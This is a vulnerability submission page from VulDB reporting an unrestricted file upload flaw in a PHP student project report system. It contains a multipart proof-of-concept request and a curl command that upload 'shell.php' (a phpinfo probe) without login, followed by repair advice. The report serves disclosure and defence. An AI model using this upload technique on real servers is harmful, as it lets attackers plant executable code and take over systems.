Soumettre #647177: 1000projects.org Online Student Project Report Submission and Evaluation System PHP Project v1.0 File unrestricted uploadinformation

Titre	1000projects.org Online Student Project Report Submission and Evaluation System PHP Project v1.0 File unrestricted upload
Description	# 1000projects.org Online Student Project Report Submission and Evaluation System PHP Project V1.0 /rse/admin/controller/student_controller.php File unrestricted upload # NAME OF AFFECTED PRODUCT(S) -Online Student Project Report Submission and Evaluation System PHP Project ## Vendor Homepage - 1000projects.org # AFFECTED AND/OR FIXED VERSION(S) ## submitter -USTC-l1nk ## Vulnerable File - /rse/admin/controller/student_controller.php ## VERSION(S) - V1.0 ## Software Link - https://1000projects.org/online-student-project-report-submission-and-evaluation-system-php-project.html#google_vignette # PROBLEM TYPE ## Vulnerability Type - File unrestricted upload ## Root Cause - A file unrestricted upload vulnerability was found in the '/rse/admin/controller/student_controller.php ' file of the 'Online Student Project Report Submission and Evaluation System PHP Project' project. The reason for this issue is that attackers can upload arbitrary files (including malicious scripts) through the parameter without proper verification of file type, size, content, or storage path, allowing them to execute malicious code on the server and perform unauthorized operations. ## Impact - Attackers can exploit this file unrestricted upload vulnerability to upload malicious scripts (such as PHP, JSP, ASP files), gain server control, access or tamper with sensitive data, spread malware, and even cause service paralysis, posing a severe threat to system security and data confidentiality. # DESCRIPTION - During the security review of "Online Student Project Report Submission and Evaluation System PHP Project", I discovered a critical file unrestricted upload vulnerability in the "/rse/admin/controller/student_controller.php " file. This vulnerability arises from inadequate validation and restrictions on the parameter when handling file uploads, enabling attackers to upload arbitrary files. As a result, attackers can execute malicious code on the server, gain unauthorized access to the system, and compromise data security. Immediate remedial measures are required to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability location: - /rse/admin/controller/student_controller.php ## Payload: ```makefile -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="id" 1 -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="old_image" 17.jpg -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="name" Razil -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="phone" 9685748596 -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="regno" 151774 -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="dob" 2019-04-02 -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="gender" male -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="dept" CS -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="year" 2019 -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="email" [email protected] -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="new_image"; filename="shell.php" Content-Type: application/octet-stream <?php phpinfo();?> -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="address" mangalore -----------------------------359889067940327199481066932168 Content-Disposition: form-data; name="update" Add -----------------------------35988906794032719948106693216 ``` ## The following are screenshots of some specific information obtained from testing file uploads: ```bash 《curl -X POST -F "[email protected]" http://x.x.x.x/rse/admin/controller/student_controller.php 》 ``` <img width="2364" height="1360" alt="Image" src="https://github.com/user-attachments/assets/f7d8d55c-3b91-4b53-9656-4ceba6dc941a" /> <img width="1988" height="1136" alt="Image" src="https://github.com/user-attachments/assets/8a0bb02a-3497-4153-aaa7-4fbc86461e18" /> # Suggested repair 1. Strict file type verification: Verify the file type through MIME type checking, file extension whitelisting, and even file content inspection to ensure only allowed file types (such as images like .jpg, .png) can be uploaded. 2. Set file size limits: Restrict the size of uploaded files to prevent large files from consuming server resources or being used for malicious purposes. 3. Store files outside the web root directory: Save uploaded files in a directory that is not directly accessible via the web, and use a script to read and deliver files when needed, avoiding direct execution of uploaded files. 4. Rename uploaded files: Generate a unique random name for each uploaded file instead of using the original filename, which can prevent path traversal attacks and ensure file uniqueness. 5. Regular security audits: Regularly check the file upload function and related code to identify and fix potential security loopholes in a timely manner.
La source	⚠️ https://github.com/lan041221/cvec/issues/23
Utilisateur	USTC-l1nk (UID 88925)
Soumission	03/09/2025 18:03 (il y a 7 mois)
Modérer	14/09/2025 08:37 (11 days later)
Statut	Dupliqué
Entrée VulDB	323859 [1000projects Online Student Project Report Submission and Evaluation System student_controller.php élévation de privilèges]
Points	0

◂ Précédent Aperçu Suivant ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!